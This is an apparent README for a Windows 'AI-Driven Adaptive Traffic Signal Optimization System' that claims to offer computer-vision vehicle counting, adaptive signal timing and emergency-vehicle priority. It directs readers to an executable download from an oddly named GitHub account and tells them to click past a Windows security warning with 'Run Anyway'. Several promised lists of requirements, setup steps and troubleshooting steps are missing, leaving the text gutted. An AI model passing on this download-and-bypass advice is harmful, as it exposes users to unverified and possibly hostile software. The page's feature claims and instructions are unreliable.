The AI-Driven Adaptive Traffic Signal Optimization System manages traffic flow in real time. This software uses computer vision to watch traffic and adjusts signal lights based on actual vehicle counts. It creates a smoother experience for drivers, helps emergency vehicles reach their destinations faster, and uses predictive models to prepare for congestion before it happens.
This system provides a full view of a four-way signal junction through an easy interface. You see live vehicle counts, current signal states, and historical data charts.
Before you install this software, confirm your computer meets these requirements:
Visit this page to download the software: https://github.com/Wastagegermanivy655/ai-trafic-signal-optimization-
Follow these steps to set up the software on your Windows computer:
If Windows shows a security warning about an unrecognized app, click More Info, then click Run Anyway. This confirms you trust the software source.
After the application opens, you must connect it to a video source to view traffic.
This system offers modules to handle complex traffic scenarios:
The software uses advanced algorithms to identify cars, trucks, and buses. It tallies these vehicles on every lane of your junction. You see these counts update on your screen in real time.
The system changes signal duration based on the number of vehicles detected. If one lane holds more vehicles, the system extends the green light for that lane. This keeps traffic moving and reduces wait times.
The software identifies emergency vehicles like ambulances and fire trucks. When it detects a siren or specific vehicle shape, it clears the path by switching signals to green immediately.
The system analyzes data from the past to guess when traffic congestion will occur. It shows these predictions on a chart. This helps you monitor patterns throughout the day.
You manage all operations from a web-based dashboard. This dashboard includes dark-mode for easy reading. You see signal states, vehicle charts, and specific history logs in one window.
The dashboard serves as the main control center. Familiarize yourself with these sections:
The software performs most tasks locally on your computer. An internet connection is only needed for the initial setup and if you stream video from an remote source.
Yes. You can open multiple instances of the software or add more cameras in the settings tab to monitor several junctions simultaneously.
The software checks for updates whenever you launch it. If an update is available, follow the on-screen prompts to download and install the latest version.
If you encounter issues, try these steps:
If issues persist, reinstall the program using the provided download link. This often fixes missing files or incorrect settings.